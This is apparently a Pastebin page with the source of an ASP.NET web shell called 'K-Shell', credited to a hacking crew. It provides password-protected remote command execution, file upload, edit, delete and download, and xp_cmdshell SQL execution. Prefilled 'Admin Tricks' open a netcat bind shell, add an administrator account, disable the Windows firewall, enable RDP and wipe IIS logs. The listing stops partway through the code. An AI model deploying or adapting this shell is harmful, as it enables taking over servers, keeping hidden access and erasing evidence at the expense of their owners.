API tools faq
paste
Guest User

K-Shell by XXx_Death_xXX ZHC

a guest
May 17th, 2013
1,189
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 32.78 KB | None | 0 0
raw download clone embed print report
  1. <%@ Page Language="VB" ContentType="text/html" validateRequest="false" aspcompat="true"%>
  2. <%@ Import Namespace="System.IO" %>
  3. <%@ import namespace="System.Diagnostics" %>
  4. <script runat="server">
  5. Dim PASSWORD as string = "XXx_Death_xXX" 'Here , change the default password "XXx_Death_xXX" to yours
  6.  
  7. '----------------------------------------------------------------------
  8. '----------------- K-Shell by XXx_Death_xXX ZHC -----------------
  9. '----------------- E-mail: [email protected] -----------------
  10. '----------------- http://zone-hack.com -----------------
  11. '----------------- Version 1.0 -----------------
  12. '----------------- Build (2011-10-10) -----------------
  13. '----------- This shell base on WebAdmin2.0(beta) By lake2 ------------
  14. '------------ and Asp.Net Security Analyzer by Dinis.cruz ------------
  15. '----------------------------------------------------------------------
  16.  
  17.  
  18. dim url,TEMP1,TEMP2,TITLE as string
  19. Sub Login_click(sender As Object, E As EventArgs)
  20. if Textbox.Text=PASSWORD then
  21. session("XXx_Death_xXX")=1
  22. session.Timeout=45
  23. else
  24. response.Write("<font color='red'>Your password is incorrect! Please check your password and try again.</font><br>")
  25. end if
  26. End Sub
  27. Sub RunCMD(Src As Object, E As EventArgs)
  28. Dim myProcess As New Process()
  29. Dim myProcessStartInfo As New ProcessStartInfo("cmd.exe")
  30. myProcessStartInfo.UseShellExecute = False
  31. myProcessStartInfo.RedirectStandardOutput = true
  32. myProcess.StartInfo = myProcessStartInfo
  33. myProcessStartInfo.Arguments="/c " & Cmd.text
  34. myProcess.Start()
  35. Dim myStreamReader As StreamReader = myProcess.StandardOutput
  36. Dim myString As String = myStreamReader.Readtoend()
  37. myProcess.Close()
  38. mystring=replace(mystring,">","&lt;")
  39. mystring=replace(mystring,"<","&gt;")
  40. result.text=Cmd.text & vbcrlf & "<pre>" & mystring & "</pre>"
  41. Cmd.text=""
  42. End Sub
  43. Sub RunCMD2(Src As Object, E As EventArgs)
  44. Dim myProcess2 As New Process()
  45. Dim myProcessStartInfo2 As New ProcessStartInfo("cmd.exe")
  46. myProcessStartInfo2.UseShellExecute = False
  47. myProcessStartInfo2.RedirectStandardOutput = true
  48. myProcess2.StartInfo = myProcessStartInfo2
  49. myProcessStartInfo2.Arguments="/c " & Cmd2.text
  50. myProcess2.Start()
  51. Dim myStreamReader2 As StreamReader = myProcess2.StandardOutput
  52. Dim myString2 As String = myStreamReader2.Readtoend()
  53. myProcess2.Close()
  54. mystring2=replace(mystring2,">","&lt;")
  55. mystring2=replace(mystring2,"<","&gt;")
  56. result.text=Cmd2.text & vbcrlf & "<pre>" & mystring2 & "</pre>"
  57. Cmd2.text=""
  58. End Sub
  59. Sub RunCMD3(Src As Object, E As EventArgs)
  60. Dim myProcess3 As New Process()
  61. Dim myProcessStartInfo3 As New ProcessStartInfo("cmd.exe")
  62. myProcessStartInfo3.UseShellExecute = False
  63. myProcessStartInfo3.RedirectStandardOutput = true
  64. myProcess3.StartInfo = myProcessStartInfo3
  65. myProcessStartInfo3.Arguments="/c " & Cmd3.text
  66. myProcess3.Start()
  67. Dim myStreamReader3 As StreamReader = myProcess3.StandardOutput
  68. Dim myString3 As String = myStreamReader3.Readtoend()
  69. myProcess3.Close()
  70. mystring3=replace(mystring3,">","&lt;")
  71. mystring3=replace(mystring3,"<","&gt;")
  72. result.text=Cmd3.text & vbcrlf & "<pre>" & mystring3 & "</pre>"
  73. Cmd3.text=""
  74. End Sub
  75. Sub RunCMD4(Src As Object, E As EventArgs)
  76. Dim myProcess4 As New Process()
  77. Dim myProcessStartInfo4 As New ProcessStartInfo("cmd.exe")
  78. myProcessStartInfo4.UseShellExecute = False
  79. myProcessStartInfo4.RedirectStandardOutput = true
  80. myProcess4.StartInfo = myProcessStartInfo4
  81. myProcessStartInfo4.Arguments="/c " & Cmd4.text
  82. myProcess4.Start()
  83. Dim myStreamReader4 As StreamReader = myProcess4.StandardOutput
  84. Dim myString4 As String = myStreamReader4.Readtoend()
  85. myProcess4.Close()
  86. mystring4=replace(mystring4,">","&lt;")
  87. mystring4=replace(mystring4,"<","&gt;")
  88. result.text=Cmd4.text & vbcrlf & "<pre>" & mystring4 & "</pre>"
  89. Cmd4.text=""
  90. End Sub
  91. Sub RunCMD5(Src As Object, E As EventArgs)
  92. Dim myProcess5 As New Process()
  93. Dim myProcessStartInfo5 As New ProcessStartInfo("cmd.exe")
  94. myProcessStartInfo5.UseShellExecute = False
  95. myProcessStartInfo5.RedirectStandardOutput = true
  96. myProcess5.StartInfo = myProcessStartInfo5
  97. myProcessStartInfo5.Arguments="/c " & Cmd5.text
  98. myProcess5.Start()
  99. Dim myStreamReader5 As StreamReader = myProcess5.StandardOutput
  100. Dim myString5 As String = myStreamReader5.Readtoend()
  101. myProcess5.Close()
  102. mystring5=replace(mystring5,">","&lt;")
  103. mystring5=replace(mystring5,"<","&gt;")
  104. result.text=Cmd5.text & vbcrlf & "<pre>" & mystring5 & "</pre>"
  105. Cmd5.text=""
  106. End Sub
  107. Sub RunCMD6(Src As Object, E As EventArgs)
  108. Dim myProcess6 As New Process()
  109. Dim myProcessStartInfo6 As New ProcessStartInfo("cmd.exe")
  110. myProcessStartInfo6.UseShellExecute = False
  111. myProcessStartInfo6.RedirectStandardOutput = true
  112. myProcess6.StartInfo = myProcessStartInfo6
  113. myProcessStartInfo6.Arguments="/c " & Cmd6.text
  114. myProcess6.Start()
  115. Dim myStreamReader6 As StreamReader = myProcess6.StandardOutput
  116. Dim myString6 As String = myStreamReader6.Readtoend()
  117. myProcess6.Close()
  118. mystring6=replace(mystring6,">","&lt;")
  119. mystring6=replace(mystring6,"<","&gt;")
  120. result.text=Cmd6.text & vbcrlf & "<pre>" & mystring6 & "</pre>"
  121. Cmd6.text=""
  122. End Sub
  123. Sub RunCMD7(Src As Object, E As EventArgs)
  124. Dim myProcess7 As New Process()
  125. Dim myProcessStartInfo7 As New ProcessStartInfo("cmd.exe")
  126. myProcessStartInfo7.UseShellExecute = False
  127. myProcessStartInfo7.RedirectStandardOutput = true
  128. myProcess7.StartInfo = myProcessStartInfo7
  129. myProcessStartInfo7.Arguments="/c " & Cmd7.text
  130. myProcess7.Start()
  131. Dim myStreamReader7 As StreamReader = myProcess7.StandardOutput
  132. Dim myString7 As String = myStreamReader7.Readtoend()
  133. myProcess7.Close()
  134. mystring7=replace(mystring7,">","&lt;")
  135. mystring7=replace(mystring7,"<","&gt;")
  136. result.text=Cmd7.text & vbcrlf & "<pre>" & mystring7 & "</pre>"
  137. Cmd7.text=""
  138. End Sub
  139. sub Editor(Src As Object, E As EventArgs)
  140. dim mywrite as new streamwriter(filepath.text,false,encoding.default)
  141. mywrite.write(content.text)
  142. mywrite.close
  143. response.Write("<script>alert('Edit|Creat " & replace(filepath.text,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(filepath.text)) &"'</sc" & "ript>")
  144. end sub
  145. Sub UpLoad(Src As Object, E As EventArgs)
  146. dim filename,loadpath as string
  147. filename=path.getfilename(UpFile.value)
  148. loadpath=request.QueryString("src") & filename
  149. if file.exists(loadpath)=true then
  150. response.Write("<script>alert('File " & replace(loadpath,"\","\\") & " have existed , upload fail!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(request.QueryString("src")) &"'</sc" & "ript>")
  151. response.End()
  152. end if
  153. UpFile.postedfile.saveas(loadpath)
  154. response.Write("<script>alert('File " & filename & " upload success!\nFile info:\n\nClient Path:" & replace(UpFile.value,"\","\\") & "\nFile Size:" & UpFile.postedfile.contentlength & " bytes\nSave Path:" & replace(loadpath,"\","\\") & "\n');")
  155. response.Write("location.href='" & request.ServerVariables("URL") & "?action=goto&src=" & server.UrlEncode(request.QueryString("src")) & "'</sc" & "ript>")
  156. End Sub
  157.  
  158. Sub NewFD(Src As Object, E As EventArgs)
  159. url=request.form("src")
  160. if NewFile.Checked = True then
  161. dim mywrite as new streamwriter(url & NewName.Text,false,encoding.default)
  162. mywrite.close
  163. response.Redirect(request.ServerVariables("URL") & "?action=edit&src=" & server.UrlEncode(url & NewName.Text))
  164. else
  165. directory.createdirectory(url & NewName.Text)
  166. response.Write("<script>alert('Creat directory " & replace(url & NewName.Text ,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</sc" & "ript>")
  167. end if
  168. End Sub
  169. Sub del(a)
  170. if right(a,1)="\" then
  171. dim xdir as directoryinfo
  172. dim mydir as new DirectoryInfo(a)
  173. dim xfile as fileinfo
  174. for each xfile in mydir.getfiles()
  175. file.delete(a & xfile.name)
  176. next
  177. for each xdir in mydir.getdirectories()
  178. call del(a & xdir.name & "\")
  179. next
  180. directory.delete(a)
  181. else
  182. file.delete(a)
  183. end if
  184. End Sub
  185. Sub copydir(a,b)
  186. dim xdir as directoryinfo
  187. dim mydir as new DirectoryInfo(a)
  188. dim xfile as fileinfo
  189. for each xfile in mydir.getfiles()
  190. file.copy(a & "\" & xfile.name,b & xfile.name)
  191. next
  192. for each xdir in mydir.getdirectories()
  193. directory.createdirectory(b & path.getfilename(a & xdir.name))
  194. call copydir(a & xdir.name & "\",b & xdir.name & "\")
  195. next
  196. End Sub
  197. Sub xexistdir(temp,ow)
  198. if directory.exists(temp)=true or file.exists(temp)=true then
  199. if ow=0 then
  200. response.Redirect(request.ServerVariables("URL") & "?action=samename&src=" & server.UrlEncode(url))
  201. elseif ow=1 then
  202. del(temp)
  203. else
  204. dim d as string = session("cutboard")
  205. if right(d,1)="\" then
  206. TEMP1=url & second(now) & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
  207. else
  208. TEMP2=url & second(now) & replace(path.getfilename(d),"","")
  209. end if
  210. end if
  211. end if
  212. End Sub
  213. Sub existdir(temp)
  214. if file.exists(temp)=false and directory.exists(temp)=false then
  215. response.Write("<center>This drive is not an accessible drive...</center>")
  216. response.End()
  217. end if
  218. End Sub
  219. Sub RunSQLCMD(Src As Object, E As EventArgs)
  220. Dim adoConn,strQuery,recResult,strResult
  221. if SqlName.Text<>"" then
  222. adoConn=Server.CreateObject("ADODB.Connection")
  223. adoConn.Open("Provider=SQLOLEDB.1;Password=" & SqlPass.Text & ";UID=" & SqlName.Text & ";Data Source = " & ip.Text)
  224. If Sqlcmd.Text<>"" Then
  225. strQuery = "exec master.dbo.xp_cmdshell '" & Sqlcmd.Text & "'"
  226. recResult = adoConn.Execute(strQuery)
  227. If NOT recResult.EOF Then
  228. Do While NOT recResult.EOF
  229. strResult = strResult & chr(13) & recResult(0).value
  230. recResult.MoveNext
  231. Loop
  232. End if
  233. recResult = Nothing
  234. strResult = Replace(strResult," ","&nbsp;")
  235. strResult = Replace(strResult,"<","&lt;")
  236. strResult = Replace(strResult,">","&gt;")
  237. resultSQL.Text=SqlCMD.Text & vbcrlf & "<pre>" & strResult & "</pre>"
  238. SqlCMD.Text=""
  239. End if
  240. adoConn.Close
  241. End if
  242. End Sub
  243. Function GetStartedTime(ms)
  244. GetStartedTime=cint(ms/(1000*60*60))
  245. End function
  246. Function getIP()
  247. Dim strIPAddr as string
  248. If Request.ServerVariables("HTTP_X_FORWARDED_FOR") = "" OR InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), "unknown") > 0 Then
  249. strIPAddr = Request.ServerVariables("REMOTE_ADDR")
  250. ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",") > 0 Then
  251. strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",")-1)
  252. ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";") > 0 Then
  253. strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";")-1)
  254. Else
  255. strIPAddr = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
  256. End If
  257. getIP = Trim(Mid(strIPAddr, 1, 30))
  258. End Function
  259. Function Getparentdir(nowdir)
  260. dim temp,k as integer
  261. temp=1
  262. k=0
  263. if len(nowdir)>4 then
  264. nowdir=left(nowdir,len(nowdir)-1)
  265. end if
  266. do while temp<>0
  267. k=temp+1
  268. temp=instr(temp,nowdir,"\")
  269. if temp =0 then
  270. exit do
  271. end if
  272. temp = temp+1
  273. loop
  274. if k<>2 then
  275. getparentdir=mid(nowdir,1,k-2)
  276. else
  277. getparentdir=nowdir
  278. end if
  279. End function
  280. Function Rename()
  281. url=request.QueryString("src")
  282. if file.exists(Getparentdir(url) & request.Form("name")) then
  283. rename=0
  284. else
  285. file.copy(url,Getparentdir(url) & request.Form("name"))
  286. del(url)
  287. rename=1
  288. end if
  289. End Function
  290. Function GetSize(temp)
  291. if temp < 1024 then
  292. GetSize=temp & " bytes"
  293. else
  294. if temp\1024 < 1024 then
  295. GetSize=temp\1024 & " KB"
  296. else
  297. if temp\1024\1024 < 1024 then
  298. GetSize=temp\1024\1024 & " MB"
  299. else
  300. GetSize=temp\1024\1024\1024 & " GB"
  301. end if
  302. end if
  303. end if
  304. End Function
  305. Sub downTheFile(thePath)
  306. dim stream
  307. stream=server.createObject("adodb.stream")
  308. stream.open
  309. stream.type=1
  310. stream.loadFromFile(thePath)
  311. response.addHeader("Content-Disposition", "attachment; filename=" & replace(server.UrlEncode(path.getfilename(thePath)),"+"," "))
  312. response.addHeader("Content-Length",stream.Size)
  313. response.charset="UTF-8"
  314. response.contentType="application/octet-stream"
  315. response.binaryWrite(stream.read)
  316. response.flush
  317. stream.close
  318. stream=nothing
  319. response.End()
  320. End Sub
  321. </script>
  322. <%
  323. if request.QueryString("action")="down" and session("XXx_Death_xXX")=1 then
  324. downTheFile(request.QueryString("src"))
  325. response.End()
  326. end if
  327. Dim hu as string = request.QueryString("action")
  328. if hu="cmd" then
  329. TITLE="CMD.NET"
  330. elseif hu="sqlrootkit" then
  331. TITLE="zone-hack.com.NET"
  332. elseif hu="clonetime" then
  333. TITLE="Clone Time"
  334. elseif hu="information" then
  335. TITLE="Web Server Info"
  336. elseif hu="goto" then
  337. TITLE="&#097;&#115;&#112;&#120;&#032;&#122;&#104;&#099;&#032;&#115;&#104;&#101;&#108;&#108;&#032;&#098;&#121;&#032;&#120;&#120;&#120;&#095;&#100;&#101;&#097;&#116;&#104;&#095;&#120;&#120;&#120;::&#050;&#048;&#049;&#049;"
  338. else
  339. TITLE=request.ServerVariables("HTTP_HOST")
  340. end if
  341. %>
  342. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
  343. <html>
  344. <p align="center"><img alt="" title="" src="http://img851.imageshack.us/img851/2304/bismillahus.jpg" /><br />
  345.  
  346. </p>
  347.  
  348. <div align="center"></div>
  349. <style type="text/css">
  350. body,td,th {
  351. color: #FFFFFF;
  352. font-family: Comic Sans Ms;
  353. }
  354. body {
  355. background-image: url("http://a6.sphotos.ak.fbcdn.net/hphotos-ak-snc6/262108_109964339097628_100002521874736_97359_1521760_n.jpg");
  356. background-position: center center;
  357. background-repeat: no-repeat;
  358. background-color: #000000;
  359. background-attachment: fixed;
  360. font-family: Comic Sans MS;
  361. font-size: 16px;
  362. }
  363. a:link {
  364. color: #FFFFFF;
  365. text-decoration: none;
  366. }
  367. a:visited {
  368. text-decoration: none;
  369. color: #FFFFFF;
  370. }
  371. a:hover {
  372. text-decoration: none;
  373. color: #00FF00;
  374. }
  375. a:active {
  376. text-decoration: none;
  377. color: #00FF00;
  378. }
  379. .button {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5}
  380. .TextBox {border: 1px solid #084B8E}
  381. .style3 {color: #00FF00}
  382. .text {font-family: Comic Sans MS; font-size: 18px}
  383. .title {font-family: Comic Sans MS; font-size: 22px;}
  384. .footer {font-size: 12px;}
  385. </style>
  386. <head>
  387. <meta http-equiv="Content-Type" content="text/html">
  388. <title>Aspx Shell By XXx_Death_xXX & ZHC</title>
  389. </head>
  390. <body>
  391. <%
  392. Dim error_x as Exception
  393. Try
  394. if session("XXx_Death_xXX")<>1 then
  395. response.Write("<br>")
  396. response.Write("<center><span class=""title""><b>Welcome to ZCompany Hacking Crew Shell</b></span></center><br>")
  397. response.Write("<center><span class=""style3"">Note:</span> You MUST click the login button and not hit enter.</center>")
  398. %>
  399. <form runat="server">
  400. <br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/>
  401. <center>Password:<asp:TextBox ID="TextBox" runat="server" TextMode="Password" class="TextBox" />
  402. <asp:Button ID="Button" runat="server" Text="Login" ToolTip="Click here to login" OnClick="login_click" class="button" /></center>
  403. </form>
  404. <%
  405. else
  406. dim temp as string
  407. temp=request.QueryString("action")
  408. if temp="" then temp="goto"
  409. select case temp
  410. case "goto"
  411. if request.QueryString("src")<>"" then
  412. url=request.QueryString("src")
  413. else
  414. url=server.MapPath(".") & "\"
  415. end if
  416. call existdir(url)
  417. dim xdir as directoryinfo
  418. dim mydir as new DirectoryInfo(url)
  419. dim hupo as string
  420. dim xfile as fileinfo
  421. %>
  422. <p align="center">Current Directory: <font color= #00FF00><%=url%></font></p>
  423. <table width="75%" border="0" align="center">
  424. <tr>
  425. <td width="13%">Action:</td>
  426. <td width="87%">
  427. <a href="?action=new&src=<%=server.UrlEncode(url)%>" title="New file or directory">New</a> |
  428. <a href="?action=upfile&src=<%=server.UrlEncode(url)%>" title="Upload file"> Upload</a> |
  429. <a href="?action=goto&src=" & <%=server.MapPath(".")%> title="Go to this file's directory"> Index Root</a> |
  430. <a href="?action=logout" title="Exit"> Exit</a></td>
  431. </tr>
  432. <tr>
  433. <td>
  434. Drive: </td>
  435. <td>
  436. <%
  437. dim i as integer
  438. for i =0 to Directory.GetLogicalDrives().length-1
  439. response.Write("<a href='?action=goto&src=" & Directory.GetLogicalDrives(i) & "'>" & Directory.GetLogicalDrives(i) & " </a>")
  440. next
  441. %>
  442. </td>
  443. </tr>
  444.  
  445. <tr>
  446. <td>Tools:</td>
  447. <td><a href="?action=sqlrootkit" target="_blank">SQL Command</a> |<a href="?action=cmd" target="_blank"> Command Line</a> |<a href="?action=information" target="_blank"> System Information</a></td>
  448. </tr>
  449.  
  450. <tr>
  451. <td width="20%">Admin Tricks: </td>
  452. <td width="80%"><a href="?action=cmd5" target="_blank">Add User</a> |<a href="?action=cmd6" target="_blank"> Add User To Administrators Group</a> |<a href="?action=cmd7" target="_blank"> Disable Windows Firewall</a> |<a href="?action=cmd4" target="_blank"> Enable RDP</a> |<a href="?action=cmd3" target="_blank"> Wipe IIS Logs</a></td>
  453.  
  454. </tr>
  455.  
  456. <tr>
  457. <td width="20%">Silentz's Tricks: </td>
  458. <td width="80%"><a href="?action=cmd2" target="_blank">Start NC</a></td>
  459. </tr>
  460. </table>
  461. <hr noshade width="70%">
  462. <table width="90%" border="0" align="center">
  463. <tr>
  464. <td width="30%"><strong>Name</strong></td>
  465. <td width="10%"><strong>Size</strong></td>
  466. <td width="20%"><strong>Last Modified</strong></td>
  467. <td width="25%"><strong>Action</strong></td>
  468. </tr>
  469. <tr>
  470. <td><%
  471. hupo= "<tr><td><a href='?action=goto&src=" & server.UrlEncode(Getparentdir(url)) & "'><i>|Parent Directory|</i></a></td></tr>"
  472. response.Write(hupo)
  473. for each xdir in mydir.getdirectories()
  474. response.Write("<tr>")
  475. dim filepath as string
  476. filepath=server.UrlEncode(url & xdir.name)
  477. hupo= "<td><a href='?action=goto&src=" & filepath & "\" & "'>" & xdir.name & "</a></td>"
  478. response.Write(hupo)
  479. response.Write("<td>&lt;dir&gt;</td>")
  480. response.Write("<td>" & Directory.GetLastWriteTime(url & xdir.name) & "</td>")
  481. hupo="<td><a href='?action=cut&src=" & filepath & "\' target='_blank'>Cut" & "</a>|<a href='?action=copy&src=" & filepath & "\' target='_blank'>Copy</a>|<a href='?action=del&src=" & filepath & "\'" & " onclick='return del(this);'>Del</a></td>"
  482. response.Write(hupo)
  483. response.Write("</tr>")
  484. next
  485. %></td>
  486. </tr>
  487. <tr>
  488. <td><%
  489. for each xfile in mydir.getfiles()
  490. dim filepath2 as string
  491. filepath2=server.UrlEncode(url & xfile.name)
  492. response.Write("<tr>")
  493. hupo="<td>" & xfile.name & "</td>"
  494. response.Write(hupo)
  495. hupo="<td>" & GetSize(xfile.length) & "</td>"
  496. response.Write(hupo)
  497. response.Write("<td>" & file.GetLastWriteTime(url & xfile.name) & "</td>")
  498. hupo="<td><a href='?action=edit&src=" & filepath2 & "'>Edit</a>|<a href='?action=cut&src=" & filepath2 & "' target='_blank'>Cut</a>|<a href='?action=copy&src=" & filepath2 & "' target='_blank'>Copy</a>|<a href='?action=rename&src=" & filepath2 & "'>Rename</a>|<a href='?action=down&src=" & filepath2 & "' onClick='return down(this);'>Download</a>|<a href='?action=del&src=" & filepath2 & "' onClick='return del(this);'>Del</a></td>"
  499. response.Write(hupo)
  500. response.Write("</tr>")
  501. next
  502. response.Write("</table>")
  503. %></td>
  504. </tr>
  505.  
  506. <tr>
  507. <td><hr noshade width="70%"></td>
  508. </tr>
  509. </table>
  510. <script language="javascript">
  511. function del()
  512. {
  513. if(confirm("Are you sure?")){return true;}
  514. else{return false;}
  515. }
  516. function down()
  517. {
  518. if(confirm("If the file size > 20M,\nPlease don\'t download\nYou can copy file to web directory ,use http download\nAre you sure download?")){return true;}
  519. else{return false;}
  520. }
  521. </script>
  522. <%
  523. case "information"
  524. dim CIP,CP as string
  525. if getIP()<>request.ServerVariables("REMOTE_ADDR") then
  526. CIP=getIP()
  527. CP=request.ServerVariables("REMOTE_ADDR")
  528. else
  529. CIP=request.ServerVariables("REMOTE_ADDR")
  530. CP="None"
  531. end if
  532. %>
  533. <center><p>[ System information ]</p><br/>
  534. <table width="80%" border="1" align="center">
  535. <tr>
  536. <td colspan="2"><span class="style3"><b>Web Server Information</b></span></td>
  537. </tr>
  538. <tr>
  539. <td width="40%">Server IP</td>
  540. <td width="60%"><%=request.ServerVariables("LOCAL_ADDR")%></td>
  541. </tr>
  542. <tr>
  543. <td height="73">Machine Name</td>
  544. <td><%=Environment.MachineName%></td>
  545. </tr>
  546. <tr>
  547. <td>Network Name</td>
  548. <td><%=Environment.UserDomainName.ToString()%></td>
  549. </tr>
  550. <tr>
  551. <td>User Name in this Process</td>
  552. <td><%=Environment.UserName%></td>
  553. </tr>
  554. <tr>
  555. <td>OS Version</td>
  556. <td><%=Environment.OSVersion.ToString()%></td>
  557. </tr>
  558. <tr>
  559. <td>Started Time</td>
  560. <td><%=GetStartedTime(Environment.Tickcount)%> Hours</td>
  561. </tr>
  562. <tr>
  563. <td>System Time</td>
  564. <td><%=now%></td>
  565. </tr>
  566. <tr>
  567. <td>IIS Version</td>
  568. <td><%=request.ServerVariables("SERVER_SOFTWARE")%></td>
  569. </tr>
  570. <tr>
  571. <td>HTTPS</td>
  572. <td><%=request.ServerVariables("HTTPS")%></td>
  573. </tr>
  574. <tr>
  575. <td>PATH_INFO</td>
  576. <td><%=request.ServerVariables("PATH_INFO")%></td>
  577. </tr>
  578. <tr>
  579. <td>PATH_TRANSLATED</td>
  580. <td><%=request.ServerVariables("PATH_TRANSLATED")%></td>
  581. <tr>
  582. <td>SERVER_PORT</td>
  583. <td><%=request.ServerVariables("SERVER_PORT")%></td>
  584. </tr>
  585. <tr>
  586. <td>SeesionID</td>
  587. <td><%=Session.SessionID%></td>
  588. </tr>
  589. <tr>
  590. <td colspan="2"><span class="style3"><b>Client Infomation</b></span></td>
  591. </tr>
  592. <tr>
  593. <td>Client Proxy</td>
  594. <td><%=CP%></td>
  595. </tr>
  596. <tr>
  597. <td>Client IP</td>
  598. <td><%=CIP%></td>
  599. </tr>
  600. <tr>
  601. <td>User</td>
  602. <td><%=request.ServerVariables("HTTP_USER_AGENT")%></td>
  603. </tr>
  604. </table>
  605. <%
  606. case "cmd"
  607. %>
  608. <form runat="server">
  609. <center><p>[ Command Prompt ]</p>
  610. <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
  611. Command:
  612. <asp:TextBox ID="cmd" runat="server" Width="300" class="TextBox" />
  613. <asp:Button ID="Button123" runat="server" Text="Run" OnClick="RunCMD" class="button"/></center>
  614. <p>
  615. <asp:Label ID="result" runat="server" style="style2"/></p>
  616. </form>
  617. <%
  618. case "cmd2"
  619. %>
  620. <form runat="server">
  621. <center><p>[ Command Prompt ]</p>
  622. <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
  623. Command:
  624. <asp:TextBox ID="cmd2" runat="server" Width="300" class="TextBox" text="nc -l -v -p 12345 -d -e cmd.exe"/>
  625. <asp:Button ID="Button1234" runat="server" Text="Run" OnClick="RunCMD2" class="button" /></center>
  626. <p>
  627. <asp:Label ID="result2" runat="server" style="style2"/></p>
  628. </form>
  629. <%
  630. case "cmd3"
  631. %>
  632. <form runat="server">
  633. <center><p>[ Command Prompt ]</p>
  634. <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
  635. Command:
  636. <asp:TextBox ID="cmd3" runat="server" Width="300" class="TextBox" text="del C:\WINDOWS\system32\LogFiles\W3SVC1\*.log"/>
  637. <asp:Button ID="Button12345" runat="server" Text="Run" OnClick="RunCMD3" class="button" /></center>
  638. <p>
  639. <asp:Label ID="result3" runat="server" style="style2"/></p>
  640. </form>
  641. <%
  642. case "cmd4"
  643. %>
  644. <form runat="server">
  645. <center><p>[ Command Prompt ]</p>
  646. <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
  647. Command:
  648. <asp:TextBox ID="cmd4" runat="server" Width="300" class="TextBox" text="reg add hklm\system\currentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0x0 /f"/>
  649. <asp:Button ID="Button123456" runat="server" Text="Run" OnClick="RunCMD4" class="button" /></center>
  650. <p>
  651. <asp:Label ID="result4" runat="server" style="style2"/></p>
  652. </form><%
  653. case "cmd5"
  654. %>
  655. <form runat="server">
  656. <center><p>[ Command Prompt ]</p>
  657. <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
  658. Command:
  659. <asp:TextBox ID="cmd5" runat="server" Width="300" class="TextBox" text="net user USERNAME PASSWORD /add"/>
  660. <asp:Button ID="Button1234567" runat="server" Text="Run" OnClick="RunCMD5" class="button" /></center>
  661. <p>
  662. <asp:Label ID="result5" runat="server" style="style2"/></p>
  663. </form>
  664. <%
  665. case "cmd6"
  666. %>
  667. <form runat="server">
  668. <center><p>[ Command Prompt ]</p>
  669. <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
  670. Command:
  671. <asp:TextBox ID="cmd6" runat="server" Width="300" class="TextBox" text="net localgroup Administrators USERNAME /add"/>
  672. <asp:Button ID="Button12345678" runat="server" Text="Run" OnClick="RunCMD6" class="button" /></center>
  673. <p>
  674. <asp:Label ID="result6" runat="server" style="style2"/></p>
  675. </form>
  676. <%
  677. case "cmd7"
  678. %>
  679. <form runat="server">
  680. <center><p>[ Command Prompt ]</p>
  681. <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
  682. Command:
  683. <asp:TextBox ID="cmd7" runat="server" Width="300" class="TextBox" text="reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v EnableFirewall /t REG_DWORD /d 0x0 /f"/>
  684. <asp:Button ID="Button123456789" runat="server" Text="Run" OnClick="RunCMD7" class="button" /></center>
  685. <p>
  686. <asp:Label ID="result7" runat="server" style="style2"/></p>
  687. </form>
  688. <%
  689. case "sqlrootkit"
  690. %>
  691. <form runat="server">
  692. <center><p>[ SQL Command ]</p>
  693. <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
  694. <p>SQL Host:
  695. <asp:TextBox ID="ip" runat="server" Width="300" class="TextBox" Text="127.0.0.1"/></p>
  696. <p>
  697. SQL Username:
  698. <asp:TextBox ID="SqlName" runat="server" Width="110" class="TextBox" Text='Username'/><br/>
  699. SQL Password:
  700. <asp:TextBox ID="SqlPass" runat="server" Width="110" class="TextBox" Text='Password'/>
  701. </p>
  702. Command:
  703. <asp:TextBox ID="Sqlcmd" runat="server" Width="300" class="TextBox"/>
  704. <asp:Button ID="ButtonSQL" runat="server" Text="Run" OnClick="RunSQLCMD" class="button"/>
  705. <p>
  706. <asp:Label ID="resultSQL" runat="server" style="style2"/></p></center>
  707. </form>
  708. <%
  709. case "del"
  710. dim a as string
  711. a=request.QueryString("src")
  712. call existdir(a)
  713. call del(a)
  714. response.Write("<script>alert(""Delete " & replace(a,"\","\\") & " Success!"");location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(a)) &"'</script>")
  715. case "copy"
  716. call existdir(request.QueryString("src"))
  717. session("cutboard")="" & request.QueryString("src")
  718. response.Write("<script>alert('File info have add the cutboard, go to target directory click plaste!');location.href='JavaScript:self.close()';</script>")
  719. case "cut"
  720. call existdir(request.QueryString("src"))
  721. session("cutboard")="" & request.QueryString("src")
  722. response.Write("<script>alert('File info have add the cutboard, go to target directory click plaste!');location.href='JavaScript:self.close()';</script>")
  723. case "plaster"
  724. dim ow as integer
  725. if request.Form("OverWrite")<>"" then ow=1
  726. if request.Form("Cancel")<>"" then ow=2
  727. url=request.QueryString("src")
  728. call existdir(url)
  729. dim d as string
